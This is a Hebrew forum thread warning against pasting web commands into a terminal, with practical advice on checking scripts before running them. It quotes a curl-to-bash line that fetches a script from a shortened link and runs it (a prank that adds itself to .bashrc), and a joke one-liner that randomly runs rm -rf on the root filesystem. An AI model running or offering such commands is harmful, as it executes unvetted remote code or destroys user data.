פורסם: 08/05/2017 - 14:14
נושא ההודעה: לא להדביק פקודות מהרשת אל הטרמינל
|
באתרים רבים יש פקודות רבות. הרבה פעמים רואים משהו ... אבל יש Java Script שבעת לחיצה משנים את התוכן של ה-HTML כך שבפועל מועתק קוד שונה מזה שאורים על המסך.
עוד דוגמא, אפשר לראות כאן, נא לא להדביק את זה אל המסוף שלכם:
קוד: |
curl -L http://bit.ly/10hA8iC | bash
|
|
|
חזרה לתוכן הדיון |
פורסם: 08/05/2017 - 14:28
נושא ההודעה: Re: לא להדביק פקודות מהרשת אל הטרמינל
|
elcuco : | באתרים רבים יש פקודות רבות. הרבה פעמים רואים משהו ... אבל יש Java Script שבעת לחיצה משנים את התוכן של ה-HTML כך שבפועל מועתק קוד שונה מזה שאורים על המסך.
עוד דוגמא, אפשר לראות כאן, נא לא להדביק את זה אל המסוף שלכם:
קוד: |
curl -L http://bit.ly/10hA8iC | bash
|
|
כן, צריך להבין מה אתה עושה ומה אתה קורא.
|
|
חזרה לתוכן הדיון |
פורסם: 08/05/2017 - 14:29
נושא ההודעה:
|
|
|
חזרה לתוכן הדיון |
פורסם: 08/05/2017 - 18:10
נושא ההודעה:
|
לא הבנתי מה הבעיה.
צריך לדעת מה אתה מריץ ולא סתם להוריד סקריפט ולהריץ.
המון המון תוכנות משתמשות בשיטה הזו.
לדוגמה -
שף - https://docs.chef.io/install_omnibus.html
נוד - https://nodejs.org/en/download/package-manager/#debian-and-ubuntu-based-linux-distributions
בלאקארץ (שם בכלל יש בדיקת חתימה על הסקריפט) - https://blackarch.org/downloads.html#install-repo
הבעיה היא בלינק המקוצר ואיך הגעת אליו. ולא בהתקנה דרך curl | sh
|
|
חזרה לתוכן הדיון |
פורסם: 09/05/2017 - 09:59
נושא ההודעה:
|
מבולבלים? גם אני... מכל השרשור הזה לא ברור ממה בדיוק צריך להזהר ואיך להמנע מסקריפטים כאלו. אשמח לשורה תחתונה פרקטית
|
|
חזרה לתוכן הדיון |
פורסם: 09/05/2017 - 10:03
נושא ההודעה:
|
בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.
אם נראה לי בסדר, מריץ אותו.
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 09:08
נושא ההודעה:
|
Anonymous : | מבולבלים? גם אני... מכל השרשור הזה לא ברור ממה בדיוק צריך להזהר ואיך להמנע מסקריפטים כאלו. אשמח לשורה תחתונה פרקטית |
תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 09:24
נושא ההודעה:
|
ציטוט: | תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד. |
ציטוט: | נא לא להדביק את זה אל המסוף שלכם: |
אם לא הייתי מספיק מבולבל אז עכשיו.. העלאת הנושא על ידך חשובה ובעלת ערך אבל לא כולם מנוסים ומבינים מספיק בכדי לזהות פקודה בעיתית. האם מדובר על פקודות שיש בהן כתובת http://...? איך יודעים אם יש בפקודה JS? ואיך מבצעים את זה:
ציטוט: | בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים. |
תודה
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 10:01
נושא ההודעה:
|
Anonymous : | ציטוט: | תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד. |
ציטוט: | נא לא להדביק את זה אל המסוף שלכם: |
אם לא הייתי מספיק מבולבל אז עכשיו.. העלאת הנושא על ידך חשובה ובעלת ערך אבל לא כולם מנוסים ומבינים מספיק בכדי לזהות פקודה בעיתית. האם מדובר על פקודות שיש בהן כתובת http://...? איך יודעים אם יש בפקודה JS? ואיך מבצעים את זה:
ציטוט: | בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים. |
תודה |
זאת בדיחה. תודה שהרסת לי. יא קקה. בכל זאת תריץ - יהיה צחוקים.
ברצינות :
הבעייה היא לא JavaScript. אלא שאתה מאפשר למישהו חיצוני להריץ קוד bash על המחשב שלך. ואין לך שליטה עליו. איך מובטח לך שאין באמצע פקודה שמוחקת לך את הדיסק? או במקביל מתקינה לך משהו חדש? או שאין באג בגרסה הספציפית שאתה מוריד?
מאיר אמר שהוא מוריד את הקובץ, בודק אותו ואז מריץ ידנית.
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 12:09
נושא ההודעה:
|
אז הבעיה שאני לוקח אתכם יותר מדי ברצינות...!
הרצתי ומופיע רקדן ברזולוציה נמוכה - מקווה שבפעם הבאה אדע להמנע מאיזה רקדן מסוכן
תודה
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 14:44
נושא ההודעה:
|
Anonymous : | אז הבעיה שאני לוקח אתכם יותר מדי ברצינות...!
הרצתי ומופיע רקדן ברזולוציה נמוכה - מקווה שבפעם הבאה אדע להמנע מאיזה רקדן מסוכן
תודה |
תפעיל רמקולים יא קקה. הרסת חצי מהבדיחה.
אבל עדיין ההמלצה תקפה - אל תדביק דברים באופן אקראי מהרשת, גם מאתרים מוכרים. הם תמיד html של הדף שלך - ולכן יכולות לשנות את ה-dom.
זה לא קרה לך, אבל גם עדיין לא דרסו אותי במעבר חצייה, אז אין טעם להסתכל מהצדדים או לחכות לאור ירוק.
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 15:31
נושא ההודעה:
|
מסתבר שגם להרוס בדיחות צריך לדעת... הרמקול מופעל רק שמשום מה אין לי רמקול כשמריצים מהטרמינל. את העיקר נראה שהבנתי ומקווה להזהר בפעם הבאה
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 15:45
נושא ההודעה:
|
יאללה נעלה שלב
קוד: | [ $[ $RANDOM % 6 ] == 0 ] && rm -rf —no-preserve-root / || echo *Click* |
|
|
חזרה לתוכן הדיון |
פורסם: 10/05/2017 - 15:45
נושא ההודעה:
|
חברים, קצת דרך ארץ לא תזיק!
לשואל המבולבל, ואחרים שאולי יגיעו לשרשור הזה:
יש פה ניסיון להזהיר בפני שתי שיטות עבודה מסוכנות שעלולות להוביל לביצוע פקודות מזיקות על המחשב שלכם:
1. הדבקת טקסט ישירות מדף אינטרנט למסוף.
אתר זדוני יכול להציג טקסט אחד, אבל להעתיק טקסט שונה לגמרי, ואם בסופו יש סימן n\, הפקודה תתבצע לפני שתספיקו לשים לב שזו בכלל לא הפקודה שהעתקתם.
שתי דרכים למנוע את המצב הן:
1.1 להדביק קודם את השורה בעורך טקסט, לבחון אותה, ואם בטוחים שזה מה שרוצים להריץ, להדביק במסוף.
1.2 להקליד את הפקודה בעצמכם. זו הדרך הטובה ביותר לוודא שאתם גם מבינים מה אתם עושים, ולא סתם מעתיקים בצורה עיוורת בתקווה שזה יפתור את הבעיה שלה חיפשתם פתרון.
2. הרצה של סקריפטים שהורדו מהרשת בלי לבדוק מה באמת ירד, ואפילו מאיזה קישור.
בדוגמה עם curl מבקשים להוריד מ-URL מקוצר (שמחביא את הכתובת האמתית) וישר להריץ את מה שירד ע"י הזרמתו (דרך צינור | ) ל-shell.
כדי להימנע מצרות כאלה, יש לפעול במשנה זהירות:
2.1 להוריד רק מאתרים שאתם בוטחים בהם, ואם קיבלתם מסיבה כלשהי URL מקוצר, לבדוק טוב טוב לאן הוא מוביל באמת.
2.2 אם יש לכם את הידע, עדיף לעבור על הסקריפט שהורדתם. אם אין, תצטרכו לסמוך על מי ששם את הסקריפט, וגם שלא פרצו לו לאתר ולא השחילו משהו.
ולבסוף, רוב החברים באתר עם הידע, מבינים די מהר שצירפת קישור עם סריפט ריק רול.
שגם מוסיף עצמו ל-bashrc. כדי לרוץ אוטומטית.
ומי שאין לא מספיק ידע, לא יסתכן לבדוק.
אז ממש לא צריך לצעוק "קקה" על מי ששאל שאלות על זה או הסתכן ובדק שהסקריפט עובד!!!
אם כי אני מודה שלא ציפיתי שריק רולינג יגיע גם ל-bash...
--לב
|
|
חזרה לתוכן הדיון |
פורסם: 11/05/2017 - 19:21
נושא ההודעה:
|
|
|
חזרה לתוכן הדיון |
פורסם: 22/10/2018 - 23:19
נושא ההודעה: Re: לא להדביק פקודות מהרשת אל הטרמינל
|
אני מתפלא שמשתמש שיודע לכתוב סקריפטים מתוחכמים ל-shell נותן לפונקציה את השם "?has".
|
|
חזרה לתוכן הדיון |
|